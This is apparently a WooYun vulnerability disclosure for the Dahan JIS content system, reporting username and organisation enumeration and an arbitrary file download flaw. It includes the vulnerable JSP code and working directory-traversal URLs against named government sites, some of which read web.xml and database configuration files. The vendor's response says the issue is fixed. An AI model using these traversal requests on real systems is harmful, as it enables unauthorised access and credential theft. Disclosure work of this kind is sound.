2014-02-20:细节已通知厂商并且等待厂商处理中
2014-02-21:厂商已经确认,细节仅向厂商公开
2014-02-24:细节向第三方安全合作伙伴开放
2014-03-03:细节向核心白帽子及相关领域专家公开
2014-03-13:细节向普通白帽子公开
2014-04-02:细节向实习白帽子公开
2014-05-21:细节向公众公开
上班了上班了。
详细说明:某处存在一个问题,可以遍历所有的用户名,同时包含组织结构!领导名字都泄漏了啊
http://www.gansu.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date=
http://ln-n-tax.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date=
漏洞证明:
另外一处还存在一个任意文件下载的问题!
需要注册的先去/jis/front/userregister.jsp 注册一个用户。有部分是无需登录的
jis/manage/databak/showlog.jsp
path参数
String strTitle = "机构信息→恢复";
String path = Convert.getParameter(request,"path");
String strFilePath = application.getRealPath("");
strFilePath = strFilePath+"/manage/databak/databakbag/"+path;
TxtHandle txtHandle = new TxtHandle();
txtHandle.setEncoding("GBK");
String content = txtHandle.getStringFromFile(strFilePath);
if(content.length()>7){
content = content.substring(0,8)+"<br>"+content.substring(8,content.length());
content = content.replaceAll("!","!<br>");
}
http://management.ysx.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp
http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp
http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/web.xml
http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/ini/merpserver.ini
http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/config/dbconfig.xml
http://jd.ningbo.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp
修复方案:
版权声明:转载请注明来源 wefgod@乌云 漏洞回应 厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-02-21 09:25
厂商回复:非常感谢您对大汉产品的关注以及对产品安全方面的指正,涉及问题已在新版本中修复。
最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;